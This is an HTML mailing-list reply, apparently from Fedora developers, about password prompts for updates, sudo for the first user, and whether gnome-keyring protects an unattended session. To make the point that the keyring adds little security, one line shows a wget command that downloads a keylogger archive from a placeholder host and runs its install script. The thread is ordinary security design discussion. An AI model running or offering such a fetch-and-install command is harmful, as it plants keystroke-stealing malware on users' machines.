On 8/20/07, <b class="gmail_sendername">Jesse Keating</b> <<a href="mailto:jkeating@redhat.com">jkeating@redhat.com</a>> wrote:<div><span class="gmail_quote"></span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
On Mon, 20 Aug 2007 12:02:56 -0400<br>"Colin Walters" <<a href="mailto:walters@redhat.com">walters@redhat.com</a>> wrote:<br><br>> Ok, here is where we need to frame the discussion. The scenario I am<br>
> thinking of is a Fedora spin that is in the "XP/OS X" category.<br><br>Not really helpful here, but OS X does prompt you for your password<br>when installing updates. Presumably so that they can do some sudo
<br>action behind the scenes to apply said updates. I'm comfortable with<br>this, especially if we go down the road of adding the first user to<br>sudo at install time.</blockquote><div> <br>That is interesting; I honestly haven't used OS X at all. Does OS X also have a password on your account by default, or did you have to explicitly set one?
<br></div><br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Does gnome-keyring have a sensible timeout? If I left my workstation<br>for a period of time and forgot to enable the screensaver, can anybody
<br>access my keyring contents, or cause something to be authenticated via<br>my keyring?</blockquote><div><br>Unrelated but - in my opinion gnome-keyring adds very little in terms of security to this scenario.<br><br>wget
<a href="http://my.favorite.keylogger.example.com/linux-x86.tgz">http://my.favorite.keylogger.example.com/linux-x86.tgz</a> && tar xzvf *.tgz && sh keylogger/install.sh<br><br><br></div></div>